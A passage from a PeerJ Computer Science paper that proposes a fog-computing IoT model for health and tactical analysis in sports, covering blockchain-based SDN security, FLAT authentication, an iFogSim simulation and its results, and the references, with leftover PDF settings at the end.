to change the network structure of the sdn controller. the packet parser dynamically tracks arrived packets to extract metadata. � step : the flow topology graph builder carries out the operations of parsing metadata properties set and network topology to analyze datasets from the packet parsing karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ phase and create a graph of the network flow topology. the logical and physical topologies of metadata for each flow are stored. the system distinguishes changes, malicious updates, and security strategy violations by looking at the graph of the stream topology created and byte/packet statistics transferred for each flow. � step : the verifier confirms the metadata according to the management strategies defined by the analyst. it marks the known attacks in line with management strategies. it warns only when it recognizes an unreliable condition, not for every flow. the migration agent recognizes attacks like flooding and makes decisions after received alerts. these decisions are added to the reactive rules of the parser. in case of flooding attack, it sends the packets to the data plane cache which is a temporary storage area, to prevent the controller from flooding and overloading. after updating the flow rule, the cached packets are processed. due to the blockchain-based sdn controller, data changes and flooding attacks are detected in the fog layer (sharma, chen & park, ). thus, data integrity is provided. the sdn controller method can be integrated into the proposed model to ensure data integrity during data transmission from sensors to fog nodes. in the proposed model, the arrived packages in fig. consist of raw data generated by the sensors. when this method is used, the data flow on the topology is examined before the task management starts in the fog nodes. thus, data can be supported to reach the fog nodes safely. analysis of the proposed model in this section, the proposed model is analyzed in terms of low latency, data accuracy, authentication and privacy, data integrity and accessibility, bandwidth savings. low latency since fog computing is a locally operating mechanism, fog computing and iot based health and tactical analysis monitoring model in sports have low latency. thus, rapid intervention, which is very important in health, can be provided. it is also important that data processing and response transmissions are done quickly for technical issues. research data from an artificial intelligence expert at the stats analytics company, shows that it is important to take action quickly under a tactically negative situation: “you identify a specific scenario that tends to disrupt the opponent, giving you, say, a -s window where the opponent is disorganized” (burn-murdoch, ). since the data is processed on fog servers without the internet, the delay time in transmitting the response is low. in addition, response time and cost are further reduced with the fog task management algorithm based on process priorities (choudhari, moh & moh, ). data on which the response delay time is ignored is encrypted on the fog servers and processed or stored in the remote cloud server. accuracy of perceived data correct positions must be taken from players and the ball to carry out tactical analyzes. linear position sensors are used for this. by determining the positions of each node with karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ linear position sensors, methods such as voronoi graph, delaunay triangle, dominant regions and shading are obtained. these methods help to make tactical analysis. zigbee network is used for the devices to communicate with each other. the risk of data corruption is reduced due to the reasons such as the coverage of the zigbee network within the field boundaries and using the aes- symmetric encryption structure in it. therefore, the zigbee protocol contributes to the accurate acquisition of data. since the fog nodes are close to the end devices, the fog layer in our model reduces the risk of data corruption due to distance. authentication and privacy the proposed model uses the flat protocol for authentication and data privacy. flat is efficient for iot applications with resource-constrained devices and using fog computing (santos et al., ). in fidm using cloud computing, the client is directed to idp after communicating with sp first. however, in the flat protocol, the client directly contacts idp to reduce this cost. in the certificate exchange between sp and idp, the cost of asymmetric encryption is negligible, since both providers are servers with high computing power. symmetric switches are assigned to formatted puf output to clients with limited resources before the system starts processing. therefore, client-sp and client-idp communications are secured with symmetric encryption, which is lightweight. in the proposed model, asymmetric and symmetric encryptions are used for authentication and data security, and privacy is also provided. according to the flat protocol, since the transported data is encrypted, data content cannot be accessed even if the data is captured in man-in-the-middle (mitm) attacks. also, in order to prevent mitm, digital signatures are verified by exchanging certificates between idp and sp before sending the shared key to sp. the client’s identity is also verified by idp using symmetric keys. the attacker cannot obtain the implicit certificate supplied by a legitimate certification authority and the private key of the fog node. thus, impersonation attacks can be prevented because fog nodes use certificates and signatures. figure the structure of the blockchain based sdn controller. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data integrity and accessibility in iot applications using fog layer, the data perceived from the sensor devices are transmitted from the wireless environments to the fog nodes, so they may have vulnerabilities against attacks. some security measures (such as encryption) are taken by the zigbee network and the flat method, which is lightweight and secure, is used for authentication. flat also supports the protection of data integrity for fog nodes with methods such as digital signature. however, in order to protect the integrity of the data obtained from end nodes, blockchain based sdn controller structure is used in the fog layer. a flow topology graphic is created by parsing the arrived packets. then, the data verification is performed in verifier according to defined rules. this method is especially effective against flooding attacks. packages are stored in the data plane cache to prevent flooding and overloading of the sdn controller. thus, the system continues to operate without loss of information and overflow. the cached packets are processed after high flow is over. thus, the sdn controller can detect and warn attacks such as false topology, arp poisoning and ddos (sharma, chen & park, ). with blockchain’s distributed data management, the cost of the system is reduced and its integrity and data security are ensured (yang, cha & song, ). bandwidth savings implicit certificate structure is used in certificate changes. the implicit certificate, also called the elliptic curve qu-vanstone (ecqv), is a public key certificate (santos et al., ). implicit certificates include id, public key, and digital signature of the certification authority. since these data are sent as a public key certificate, not separately, the certificate sizes are decreasing. thus, bandwidth is significantly saved. simulation of the proposed model this section includes the detailed simulation of the proposed algorithm using the ifogsim program. topology the number of nodes in the fog layer and accordingly the topology structure can be changed. the simulation of the proposed algorithm, three fog nodes consisting of two levels are used in the fog layer. in fig. , one of the three nodes is only responsible for communication with the cloud and performs storage tasks. the other two nodes carry out the requests and transmit the results to the actuators. in fig. , the node f- represents the numofgateways variable in the simulation, while the nodes f- and f- represent the numofenddevpergateway variable in the simulation. the nodes s- , s- , s- and s- represent sensors in players and in the field of sports. the t- and t- nodes represent actuators such as technical team and club doctors. in the simulation, it is assumed that the data obtained from the sensors have successfully passed the security steps and are completely legal data. the simulation includes placing requests on the fog nodes and the proposed resource management algorithm. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ features of fog nodes used in simulation the features of the simulation application is taken as an example from (buyya & srirama, ). in the simulation, fog nodes are created with linux operating system, x architecture and xen as virtual machine manager. additionally, the createfogdevice function is used to create a new fog node. accordingly, the parameters of this function and the properties of the fog nodes are given in table . structure of the simulation application three modules are used in the application as “clientmodule”, “mainmodule”, “storagemodule”. it is assumed that it is placed in the “clientmodule” end fog devices and the “storagemodule” cloud device. “mainmodule” is the starting module. the modules, the names given to the data exchange and the direction of the tuples used in data transmission are shown in fig. (buyya & srirama, ). figure the topology used in the simulation of the proposed algorithm. full-size doi: . /peerj-cs. /fig- table features of fog nodes used in simulation. features .level fog devices .level fog devices mips , , ram , , upbw , , downbw , level ratepermips busypower . . idlepower . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the code structure of the simulation application the number of fog nodes can be determined with the variables “numofgateways” and “numofenddevpergateway” in the “testapplication.java” file where the main block of the simulation application is located in the ifogsim program. small values (respectively and ) are given to these variables to show that the proposed algorithm is fully simulated. the object of the “mymoduleplacement.java” class is called for module placement in the main block in the simulation application. this class is designed according to the proposed algorithm. since data flow cannot be done with the sensors in the simulation, the requests (mips and time values) are given to the system randomly through a list. these requests, which are assumed to be sorted according to their priorities, are assigned to the fog nodes sequentially according to the proposed algorithm. after each assignment, the list of fog nodes is sorted according to their unused capacity. in a loop, if the request can only be satisfied by one fog node, it is placed at that fog node and the loop breaks. in this case, the module placement process is carried out according to the code in fig. . if the request cannot be assigned to a single fog node, the list of fog nodes is scanned backwards and the capacities of the nodes are summed. if the appropriate capacity is reached, it is distributed across these fog nodes. in this case, the module placement process is carried out according to the code in fig. . if the request cannot be assigned to any fog node (single or distributed), the request is rejected because there is not enough capacity in the fog layer. this process is shown in the code in fig. . figure data exchange between modules in simulation. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure module placement executed if the request can only be assigned to a fog node. full-size doi: . /peerj-cs. /fig- figure module placement executed if the request could not be assigned to a single fog node. full-size doi: . /peerj-cs. /fig- figure process executed when the request is not assigned to the fog layer. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results of the simulation application the simulation results according to the randomly generated ( , , , , , , , , , , , ) (mips) list of requests are shown in fig. . at the same time, a randomly generated deadline is determined for each request. in fig. , numofgateways = , numofenddevpergateway = are selected. in the graphics in fig. , the simulation is run by increasing the “numofenddevpergateway” value. in the “tuple cpu execution delay” heading in fig. , the types and delay times of the tuples transmitted between modules are shown. source and target modules and types of requests are given in table . figure simulation results of the proposed algorithm. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the area in the node or nodes where the request is placed during the deadline period is reserved for that request. in the simulation, assuming that the placed requests have not yet produced results, the other requests in the queue continue to be placed in fog nodes. in order to show the result of each phase, the number of fog nodes was chosen as . for results that occur with more fog nodes, it can be re-run by changing the values of “numofgateways” and “numofenddevpergateway” in the main block of the simulation application. in fig. , the “results” part, produced as a standard by the ifogsim program, shows the time spent for the operation of the system, the energy spent and the general cost. table the flow and types of tuples between modules. source destination tuple type direction iotsensor clientmodule iotsensor up clientmodule mainmodule rawdata up mainmodule storagemodule storedata up mainmodule clientmodule resultdata down clientmodule iotactuator response down figure graphs of the simulation results of the proposed algorithm. graphs of the simulation results of the proposed algorithm ((a) execution time, (b) total network usage, (c) application loops delay time, (d) cost of execution in cloud). full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the graph of execution time (a), total network usage (b), application loop delays time (c), cost of execution in cloud (d) values from the simulation results obtained by changing the number of fog nodes is shown in fig. . as the number of nodes increases, execution time and application loop delay increase. when the number of nodes is , high latency occurs in the rawdata tuple. therefore, execution time and application loop delay are much higher. while the total network usage increases with the number of nodes, it decreases when there are nodes. the high delay of the rawdata tuple does not affect network activities. in addition, the total network usage may vary depending on the request costs. cloud usage cost is highest when the number of nodes is . this situation varies according to the cost values of the requests. address for simulation codes: github.com/akarakaya/simapp. comparison of the proposed model the proposed study is compared with buyya & srirama ( ), which shares the simulation codes openly. both studies are compared using numofgateways = and numofenddevpergateway = parameters. in addition, the fog nodes with the features in table are used. the comparison results are shown in table . according to the comparison results, data transmission delay times between modules and network usage are lower in the proposed model. the cloud node costs are higher than the fog node costs. additional protocols and remote server are used in communication with the cloud nodes. this indicates that fog computing causes lower latency than cloud computing. therefore, fog computing is used in the proposed algorithm. in table , the values of the proposed model are taken from the result in fig. . if every request in the simulation is supplied by the fog layer in the proposed algorithm (if the situation in fig. does not occur), the values of the proposed model in table are much lower. however, this also depends on the size of the requests and the capacity of the fog nodes. challenges in wearable technologies and future works this section includes challenges in wearable technologies and some future study suggestions. when wearable device technology is combined with fog computing, this table comparison of the proposed algorithm with the related work. features buyya & srirama ( ) the proposed algorithm execution time total network usage . . application loop delays time . . cost of execution in cloud , . , , . tuple cpu executıon delay (rawdata) . . tuple cpu executıon delay (resultdata) . . tuple cpu executıon delay (iotsensor) . . tuple cpu executıon delay (storedata) . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/akarakaya/simapp http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ integrated structure can be a solution for applications requiring low latency (fiandrino et al., ). however, today there are a lot of challenges with wearable technologies. therefore, the issue of wearable technologies was not included in this article. challenges in wearable technologies; � devices may not be suitable for every user’s body. for this reason, the most appropriate and ergonomic product is tried to be developed according to age groups (hänsel et al., ). � with the interdisciplinary study between psychologists and engineers for new healthcare device designs, the product is addressed in terms of both technological and behavioral change. since wearable health devices self-diagnosis without medical knowledge may mislead the user, this situation should be handled in the developed wearable products. the future of wearable applications should support not only the development of new analysis algorithms for health data, but also the feedback of users for behavior change (hänsel et al., ). � the size, flexibility and operating requirements of existing chemical sensors used for health perception are difficult to use in applications as they are not compatible with wearable technology (bandodkar, jeerapan & wang, ). existing wearable devices do not meet the requirements due to their low power supplies, low energy density and slow charging. there are also major challenges in processing and securing the large data produced by wearable sensors. new generation cryptographic algorithms need to be developed to ensure data security and user privacy (bandodkar, jeerapan & wang, ). some future study suggestions: � wearable technologies have not yet reached the desired levels in terms of size, capacity, energy consumption, watertightness, high data processing, and security. for this reason, wearable technologies that are suitable for players and spectators, provide accurate data and are not affected by external factors such as sweat can be developed for sports applications. � lightweight and strong encryption and authentication methods can be developed for iot and fog computing applications. � consensus algorithms that are efficient on resource-constrained devices can be developed for blockchain-based iot applications. � lightweight and safe iot models can be developed for different areas similar to the health and tactical analysis monitoring model in the sports we proposed. � although the elliptic curve encryption system uses smaller keys, it provides similar security with rsa. it is based on the discrete logarithm problem. the ecc-based authentication models have been designed to prevent many attacks (islam & biswas, ). similar to ecqv implicit certificate method, post-quantum cryptographic protocols can be developed. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � communication of iot nodes, gateways, fog nodes, cloud nodes should be secure. all iot systems are affected by post-quantum security due to the needs of iot systems such as privacy, authentication, integrity (fernández-caramés, ). therefore, quantum-resistant schemes based on post-quantum cryptographic algorithm can be developed for iot and cloud systems. � authentication protocol based on post-quantum cryptography has been developed. this protocol, called lb- paka, was analyzed in a random oracle model to measure provable security and to estimate the breaching time (islam, ) protocols based on post-quantum cryptography can be developed for iot applications. � in akleylek et al. ( ), post-quantum identification scheme was proposed in iot applications. various polar forms of multivariate quadratic and cubic polynomial systems was used in this scheme. in akleylek & seyhan ( ), an authenticated key exchange approach based on the bi-gisis problem was proposed for post-quantum secure. similarly, identification and authenticated key exchange methods based on post-quantum cryptography can be developed for iot applications. conclusion in this study, a light and safe fog-based iot model is proposed in which the result obtained by analyzing the health and tactical data in sports is reported to the technical team and club doctors. in the proposed model, it is ensured that the responses to the end nodes are transmitted with low latency, and the data is processed and stored without the internet. urgent processes are given high priority with the priority queue method in the fog nodes. in this article, a resource management algorithm using priority queue method is recommended in the fog nodes. the algorithm is simulated using the ifogsim simulation tool. simulation results and comparisons with a similar study show that resource allocation and data processing in the fog nodes are performed with low latency. in similar studies in sports, iot applications are generally designed using only cloud computing. only health monitoring systems are covered. however, in the proposed model, fog computing is used for data processing and storage. thus, a higher performance architecture is created in terms of both security and low latency. in the proposed model, not only health monitoring status, but also tactical analyzes in the field are discussed. thus, the technical team and the club doctors are warned in a short time against possible negative results. for authentication, flat protocol, a lightweight authentication protocol, is used in resource-restricted devices. thanks to the implicit certificates in the flat protocol, significant savings in bandwidth can be achieved. in addition to authentication, this protocol provides data privacy. it also helps with data integrity in the fog layer. with the blockchain-based sdn controller structure, some attacks are detected and data integrity is provided. in the event of a flooding attack, data packets are stored in the cache and processed later to prevent flooding and overloading of the fog node. a lightweight and safe model is proposed for monitoring health and tactical analysis in sports. the proposed algorithm has been simulated and comparison results are given. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the future; studies on artificial intelligence methods that use the proposed model and perform health and tactical analysis in fog nodes are planned. additional information and declarations funding the authors received no funding for this work. competing interests sedat akleylek is an academic editor for peerj. author contributions � aykut karakaya conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � sedat akleylek conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the simulation application codes are available at github: https://github.com/akarakaya/simapp. references abdulkareem kh, mohammed ma, gunasekaran ss, al-mhiqani mn, mutlag aa, mostafa sa, ali ns, ibrahim da. . a review of fog computing and machine learning: concepts, applications, challenges, and open issues. ieee access : – doi . /access. . . akleylek s, seyhan k. . a probably secure bi-gisis based modified ake scheme with reusable keys. ieee access : – doi . /access. . . akleylek s, soysald m, boubiche de, toral-cruz h. . a novel method for polar form of any degree of multivariate polynomials with applications in iot. sensors ( ): doi . /s . alameddine ha, sharafeddine s, sebbah s, ayoubi s, assi c. . dynamic task offloading and scheduling for low-latency iot services in multi-access edge computing. ieee journal on selected areas in communications ( ): – doi . /jsac. . . alrawais a, alhothaily a, hu c, cheng x. . fog computing for the internet of things: security and privacy issues. ieee internet computing ( ): – doi . /mic. . . baca a, kornfeind p. . rapid feedback systems for elite sports training. ieee pervasive computing ( ): – doi . /mprv. . . bandodkar aj, jeerapan i, wang j. . wearable chemical sensors: present challenges and future prospects. acs sensors ( ): – doi . /acssensors. b . basu s, karuppiah m, selvakumar k, li k-c, islam sh, hassan mm, bhuiyan mza. . an intelligent/cognitive model of task scheduling for iot applications in cloud computing karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/akarakaya/simapp http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /mprv. . http://dx.doi.org/ . /acssensors. b http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environment. future generation computer systems ( ): – doi . /j.future. . . . bonomi f, milito r, zhu j, addepalli s. . fog computing and its role in the internet of things. in: proceedings of the first edition of the mcc workshop on mobile cloud computing. – . bormann c, ersue m, keranen a. . terminology for constrained-node networks. in: internet engineering task force (ietf), fremont, ca, usa. burn-murdoch j. . how data analysis helps football clubs make better signings. available at https://www.ft.com/content/ aa b e-c a - e - cd- e db b . buyya r, srirama sn. . modelling and simulation of fog and edge computing environments using ifogsim toolkit. in: fog and edge computing: principles and paradigms. hoboken: wiley, – doi . / .ch . choudhari t, moh m, moh t-s. . prioritized task scheduling in fog computing. in: proceedings of the acmse, conference. – . cisco. . fog computing and the internet of things: extend the cloud to where the things are. available at https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview. pdf. fang w, zhou w, li y, yao x, xue f, xiong n. . a distributed admm approach for energy-efficient resource allocation in mobile edge computing. turkish journal of electrical engineering & computer sciences ( ): – . fernández-caramés tm. . from pre-quantum to post-quantum iot security: a survey on quantum-resistant cryptosystems for the internet of things. ieee internet of things journal ( ): – doi . /jiot. . . fiandrino c, allio n, kliazovich d, giaccone p, bouvry p. . profiling performance of application partitioning for wearable devices in mobile cloud and fog computing. ieee access : – doi . /access. . . habibi p, farhoudi m, kazemian s, khorsandi s, leon-garcia a. . fog computing: a comprehensive architectural survey. ieee access : – doi . /access. . . hänsel k, wilde n, haddadi h, alomainy a. . challenges with current wearable technology in monitoring health data and providing positive behavioural support. in: proceedings of the th eai international conference on wireless mobile communication and healthcare, – . heydari g, rahbari d, nickray m. . energy saving scheduling in a fog-based iot application by bayesian task classification approach. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . horton m, gudmundsson j, chawla s, estephan j. . automated classification of passing in football. in: cao t, lim e-p, zhou z-h, ho t-b, cheung d, motoda h, eds. advances in knowledge discovery and data mining. cham: springer international publishing, – . ikram ma, alshehri md, hussain fk. . architecture of an iot-based system for football supervision (iot football). in: ieee nd world forum on internet of things (wf-iot), piscataway: ieee, – . iqbal s, malik aw, rahman au, noor rm. . blockchain-based reputation management for task offloading in micro-level vehicular fog network. ieee access : – doi . /access. . . islam sh. . provably secure two-party authenticated key agreement protocol for post-quantum environments. journal of information security and applications ( ): doi . /j.jisa. . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . https://www.ft.com/content/ aa b e-c a - e - cd- e db b http://dx.doi.org/ . / .ch https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf https://www.cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.jisa. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ islam sh, biswas g. . design of improved password authentication and update scheme based on elliptic curve cryptography. mathematical and computer modelling ( – ): – doi . /j.mcm. . . . krishnan p, duttagupta s, achuthan k. . sdn/nfv security framework for fog-to-things computing infrastructure. software: practice and experience ( ): – doi . /spe. . kuang z, li l, gao j, zhao l, liu a. . partial offloading scheduling and power allocation for mobile edge computing systems. ieee internet of things journal ( ): – doi . /jiot. . . kubler s, robert j, hefnawy a, främling k, cherifi c, bouras a. . open iot ecosystem for sporting event management. ieee access : – doi . /access. . . li h, jia z, xue x. . application and analysis of zigbee security services specification. second international conference on networks security, wireless communications and trusted computing : – . liu w, nishio t, shinkuma r, takahashi t. . adaptive resource discovery in mobile cloud computing. computer communications ( ): – doi . /j.comcom. . . . luan th, gao l, li z, xiang y, wei g, sun l. . fog computing: focusing on mobile users at the edge. available at https://arxiv.org/abs/ . . madsen h, burtschy b, albeanu g, popentiu-vladicescu f. . reliability in the utility computing era: towards reliable fog computing. in: th international conference on systems, signals and image processing (iwssip), piscataway: ieee, – . mouradian c, kianpisheh s, abu-lebdeh m, ebrahimnezhad f, jahromi nt, glitho rh. . application component placement in nfv-based hybrid cloud/fog systems with mobile fog nodes. ieee journal on selected areas in communications ( ): – doi . /jsac. . . mukherjee m, matam r, shu l, maglaras l, ferrag ma, choudhury n, kumar v. . security and privacy in fog computing: challenges. ieee access : – doi . /access. . . naha rk, garg s, georgakopoulos d, jayaraman pp, gao l, xiang y, ranjan r. . fog computing: survey of trends, architectures, requirements, and research directions. ieee access : – doi . /access. . . niu x, shao s, xin c, zhou j, guo s, chen x, qi f. . workload allocation mechanism for minimum service delay in edge computing-based power internet of things. ieee access : – doi . /access. . . nofer m, gomber p, hinz o, schiereck d. . blockchain. business & information systems engineering ( ): – doi . /s - - - . okay fy, ozdemir s. . routing in fog-enabled iot platforms: a survey and an sdn-based solution. ieee internet of things journal ( ): – doi . /jiot. . . paul a, pinjari h, hong w-h, seo hc, rho s. . fog computing-based iot for health monitoring system. journal of sensors ( ): – doi . / / . pfisterer d, lipphardt m, buschmann c, hellbrueck h, fischer s, sauselin jh. . marathonnet: adding value to large scale sport events-a connectivity analysis. in: proceedings of the first international conference on integrated internet ad hoc and sensor networks, . rahbari d, nickray m. . low-latency and energy-efficient scheduling in fog-based iot applications. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.mcm. . . http://dx.doi.org/ . /spe. http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.comcom. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . / / http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ roman r, lopez j, mambo m. . mobile edge computing, fog et al.: a survey and analysis of security threats and challenges. future generation computer systems ( ): – doi . /j.future. . . . santos ml, carneiro jc, franco am, teixeira fa, henriques ma, oliveira lb. . flat: federated lightweight authentication for the internet of things. ad hoc networks ( ): doi . /j.adhoc. . . sharma pk, chen m-y, park jh. . a software defined fog node based distributed blockchain cloud architecture for iot. ieee access : – doi . /access. . . shelby z, hartke k, bormann c. . the constrained application protocol (coap). available at https://tools.ietf.org/html/rfc . soni p, pal ak, islam sh. . an improved three-factor authentication scheme for patient monitoring using wsn in remote health-care system. computer methods and programs in biomedicine ( ): doi . /j.cmpb. . . taki t, hasegawa j-i. . visualization of dominant region in team games and its application to teamwork analysis. in: proceedings computer graphics international , piscataway: ieee, – . vales-alonso j, lópez-matencio p, gonzalez-castaño fj, navarro-helln h, baños-guirao pj, pérez-martnez fj, martnez-Álvarez rp, gonzález-jiménez d, gil-castiñeira f, duro-fernández r. . ambient intelligence systems for personalized sport training. sensors ( ): – doi . /s . wang x, chen m, taleb t, ksentini a, leung vc. . cache in the air: exploiting content caching and delivery techniques for g systems. ieee communications magazine ( ): – doi . /mcom. . . wazid m, das ak, shetty s, jo m. . a tutorial and future research for building a blockchain-based secure communication scheme for internet of intelligent things. ieee access : – doi . /access. . . yang h-k, cha h-j, song y-j. . secure identifier management based on blockchain technology in ndn environment. ieee access : – doi . /access. . . yi s, li c, li q. . a survey of fog computing: concepts, applications and issues. in: proceedings of the workshop on mobile big data, – . yoon g, choi d, lee j, choi h. . management of iot sensor data using a fog computing node. journal of sensors ( ): – doi . / / . zhu t, shi t, li j, cai z, zhou x. . task scheduling in deadline-aware mobile edge computing systems. ieee internet of things journal ( ): – doi . /jiot. . . karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.adhoc. . http://dx.doi.org/ . /access. . https://tools.ietf.org/html/rfc http://dx.doi.org/ . /j.cmpb. . http://dx.doi.org/ . /s http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / / http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a novel iot-based health and tactical analysis model with fog computing introduction fog computing features and security needs proposed model analysis of the proposed model simulation of the proposed model challenges in wearable technologies and future works conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te 